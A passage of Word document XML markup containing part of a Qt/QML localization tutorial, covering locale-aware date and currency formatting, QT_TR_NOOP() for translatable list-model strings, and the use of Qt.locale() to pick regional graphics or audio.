            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>Locale.name</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="005211D0">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="005211D0">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>property contains the language and country information for the current locale. You can use the value as is, or you can parse it to determine the appropriate content for the current locale.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005211D0" w:rsidRPr="005211D0" w:rsidRDefault="005211D0" w:rsidP="005211D0">
      <w:pPr>
        <w:pStyle w:val="a4"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="36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The following </w:t>
      </w:r>
      <w:r w:rsidRPr="00395997">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>snippet</w:t>
      </w:r>
      <w:r w:rsidRPr="005211D0">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> gets the current date and time with Date(), then converts that to a string for the current locale. Then it inserts the date string into the %1 parameter for the appropriate translation.</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typ"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="4F9D08"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Text</w:t>
      </w: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151DA9" w:rsidRDefault="005211D0" w:rsidP="005211D0">
      <w:pPr>
        <w:pStyle w:val="HTML0"/>
        <w:shd w:val="clear" w:color="auto" w:fill="3A4055"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:rStyle w:val="pln"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00151DA9">
        <w:rPr>
          <w:rStyle w:val="pln"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">    </w:t>
      </w:r>
      <w:r w:rsidRPr="00151DA9">
        <w:rPr>
          <w:rStyle w:val="pln"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>text</w:t>
      </w:r>
      <w:r w:rsidRPr="00151DA9">
        <w:rPr>
          <w:rStyle w:val="pun"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
      <w:r w:rsidRPr="00151DA9">
        <w:rPr>
          <w:rStyle w:val="pln"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> qsTr</w:t>
      </w:r>
      <w:r w:rsidRPr="00151DA9">
        <w:rPr>
          <w:rStyle w:val="pun"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:r w:rsidRPr="00151DA9">
        <w:rPr>
          <w:rStyle w:val="str"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>"Date %1"</w:t>
      </w:r>
      <w:r w:rsidRPr="00151DA9">
        <w:rPr>
          <w:rStyle w:val="pun"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>).</w:t>
      </w:r>
      <w:r w:rsidRPr="00151DA9">
        <w:rPr>
          <w:rStyle w:val="pln"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>arg</w:t>
      </w:r>
      <w:r w:rsidRPr="00151DA9">
        <w:rPr>
          <w:rStyle w:val="pun"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:r w:rsidRPr="00151DA9">
        <w:rPr>
          <w:rStyle w:val="typ"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Date</w:t>
      </w:r>
      <w:r w:rsidRPr="00151DA9">
        <w:rPr>
          <w:rStyle w:val="pun"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>().</w:t>
      </w:r>
      <w:r w:rsidRPr="00151DA9">
        <w:rPr>
          <w:rStyle w:val="pln"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>toLocaleString</w:t>
      </w:r>
      <w:r w:rsidRPr="00151DA9">
        <w:rPr>
          <w:rStyle w:val="pun"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:r w:rsidRPr="00151DA9">
        <w:rPr>
          <w:rStyle w:val="typ"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Qt</w:t>
      </w:r>
      <w:r w:rsidRPr="00151DA9">
        <w:rPr>
          <w:rStyle w:val="pun"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidRPr="00151DA9">
        <w:rPr>
          <w:rStyle w:val="pln"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>locale</w:t>
      </w:r>
      <w:r w:rsidRPr="00151DA9">
        <w:rPr>
          <w:rStyle w:val="pun"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>()))</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005211D0" w:rsidRPr="005211D0" w:rsidRDefault="005211D0" w:rsidP="005211D0">
      <w:pPr>
        <w:pStyle w:val="HTML0"/>
        <w:shd w:val="clear" w:color="auto" w:fill="3A4055"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pP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5211D0">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>To make sure currency numbers are localized, use the</w:t>
      </w:r>
      <w:r w:rsidR="00151DA9">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="be-BY"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:hyperlink r:id="rId681" w:history="1">
        <w:r w:rsidRPr="00395997">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
            <w:color w:val="17A81A"/>
            <w:highlight w:val="yellow"/>
            <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>Number</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidR="00151DA9">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="be-BY"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="005211D0">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>type. This type has similar functions as the Date type for converting numbers into localized currency strings.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005211D0" w:rsidRPr="005211D0" w:rsidRDefault="005211D0" w:rsidP="00151DA9">
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="1139" w:name="7-use-qt-tr-noop-for-translatable-data-t"/>
      <w:bookmarkStart w:id="1140" w:name="_Toc483000772"/>
      <w:bookmarkStart w:id="1141" w:name="_Toc483003770"/>
      <w:bookmarkStart w:id="1142" w:name="_Toc483604124"/>
      <w:bookmarkStart w:id="1143" w:name="_Toc483605344"/>
      <w:bookmarkEnd w:id="1139"/>
      <w:r w:rsidRPr="00151DA9">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>7. Use QT_TR_NOOP() for Translatable Data Text Strings</w:t>
      </w:r>
      <w:bookmarkEnd w:id="1140"/>
      <w:bookmarkEnd w:id="1141"/>
      <w:bookmarkEnd w:id="1142"/>
      <w:bookmarkEnd w:id="1143"/>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395997">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>If the user changes the system language without a reboot, depending on the system, the strings in arrays and list models and other data structures might not be refreshed automatically</w:t>
      </w:r>
      <w:r w:rsidRPr="005211D0">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>. To force the texts to be refreshed when they are displayed in the user interface, you need to declare the strings with the</w:t>
      </w:r>
      <w:r w:rsidRPr="005211D0">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:hyperlink r:id="rId682" w:anchor="QT_TR_NOOP" w:history="1">
        <w:r w:rsidRPr="00395997">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
            <w:color w:val="17A81A"/>
            <w:highlight w:val="yellow"/>
            <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>QT_TR_NOOP</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="00395997">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>() macro</w:t>
      </w:r>
      <w:r w:rsidRPr="005211D0">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>. Then, when you populate the objects for display, you need to explicitly retrieve the translation for each text. For example:</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typ"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="4F9D08"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>ListModel</w:t>
      </w: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id</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 xml:space="preserve"> myListModel</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w:t>
      </w:r>
      <w:r w:rsidRPr="005211D0">
        <w:rPr>
          <w:rStyle w:val="typ"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="4F9D08"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>ListElement</w:t>
      </w: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w:t>
      </w:r>
      <w:r w:rsidRPr="005211D0">
        <w:rPr>
          <w:rStyle w:val="com"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="55FFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>//: Capital city of Finland</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005211D0" w:rsidRPr="00151DA9" w:rsidRDefault="005211D0" w:rsidP="005211D0">
      <w:pPr>
        <w:pStyle w:val="HTML0"/>
        <w:shd w:val="clear" w:color="auto" w:fill="3A4055"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:rStyle w:val="pln"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00151DA9">
        <w:rPr>
          <w:rStyle w:val="pln"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">        </w:t>
      </w:r>
      <w:r w:rsidRPr="00151DA9">
        <w:rPr>
          <w:rStyle w:val="pln"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>name</w:t>
      </w:r>
      <w:r w:rsidRPr="00151DA9">
        <w:rPr>
          <w:rStyle w:val="pun"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
      <w:r w:rsidRPr="00151DA9">
        <w:rPr>
          <w:rStyle w:val="pln"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> QT_TR_NOOP</w:t>
      </w:r>
      <w:r w:rsidRPr="00151DA9">
        <w:rPr>
          <w:rStyle w:val="pun"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:r w:rsidRPr="00151DA9">
        <w:rPr>
          <w:rStyle w:val="str"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>"Helsinki"</w:t>
      </w:r>
      <w:r w:rsidRPr="00151DA9">
        <w:rPr>
          <w:rStyle w:val="pun"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>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typ"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="4F9D08"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Text</w:t>
      </w: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text</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 xml:space="preserve"> qsTr</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myListModel</w:t>
      </w:r>
      <w:r w:rsidRPr="005211D0">
        <w:rPr>
          <w:rStyle w:val="pun"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidRPr="005211D0">
        <w:rPr>
          <w:rStyle w:val="kwd"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFF55"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>get</w:t>
      </w:r>
      <w:r w:rsidRPr="005211D0">
        <w:rPr>
          <w:rStyle w:val="pun"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:r w:rsidRPr="005211D0">
        <w:rPr>
          <w:rStyle w:val="lit"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FF55FF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>0</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name</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 xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="005211D0">
        <w:rPr>
          <w:rStyle w:val="com"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="55FFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>// get the translation of the name property in element 0</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005211D0" w:rsidRPr="005211D0" w:rsidRDefault="005211D0" w:rsidP="005211D0">
      <w:pPr>
        <w:pStyle w:val="HTML0"/>
        <w:shd w:val="clear" w:color="auto" w:fill="3A4055"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pP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395997" w:rsidRDefault="005211D0" w:rsidP="00B90C6B">
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="be-BY"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="1144" w:name="8-use-locale-to-extend-localization-feat"/>
      <w:bookmarkStart w:id="1145" w:name="_Toc483000773"/>
      <w:bookmarkStart w:id="1146" w:name="_Toc483003771"/>
      <w:bookmarkStart w:id="1147" w:name="_Toc483604125"/>
      <w:bookmarkStart w:id="1148" w:name="_Toc483605345"/>
      <w:bookmarkEnd w:id="1144"/>
      <w:r w:rsidRPr="00151DA9">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>8. Use Locale to Extend Localization Features</w:t>
      </w:r>
      <w:bookmarkEnd w:id="1145"/>
      <w:bookmarkEnd w:id="1146"/>
      <w:bookmarkEnd w:id="1147"/>
      <w:bookmarkEnd w:id="1148"/>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If you </w:t>
      </w:r>
      <w:r w:rsidRPr="00217C35">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>want different graphics or audio for different geographical regions</w:t>
      </w:r>
      <w:r w:rsidRPr="005211D0">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">, you can use </w:t>
      </w:r>
      <w:r w:rsidRPr="00217C35">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Qt.</w:t>
      </w:r>
      <w:hyperlink r:id="rId683" w:anchor="locale" w:history="1">
        <w:r w:rsidRPr="00217C35">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
            <w:color w:val="17A81A"/>
            <w:highlight w:val="yellow"/>
            <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>locale</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="00217C35">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>()</w:t>
      </w:r>
      <w:r w:rsidRPr="005211D0">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> to get the current locale. </w:t>
      </w:r>
      <w:r w:rsidRPr="00217C35">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Then you choose</w:t>
      </w:r>
      <w:r w:rsidRPr="005211D0">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> appropriate graphics or audio for that locale.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005211D0" w:rsidRPr="005211D0" w:rsidRDefault="005211D0" w:rsidP="005211D0">
      <w:pPr>
        <w:pStyle w:val="a4"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="36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The following code </w:t>
      </w:r>
      <w:r w:rsidRPr="00217C35">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>snippet</w:t>
      </w:r>
      <w:r w:rsidRPr="005211D0">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
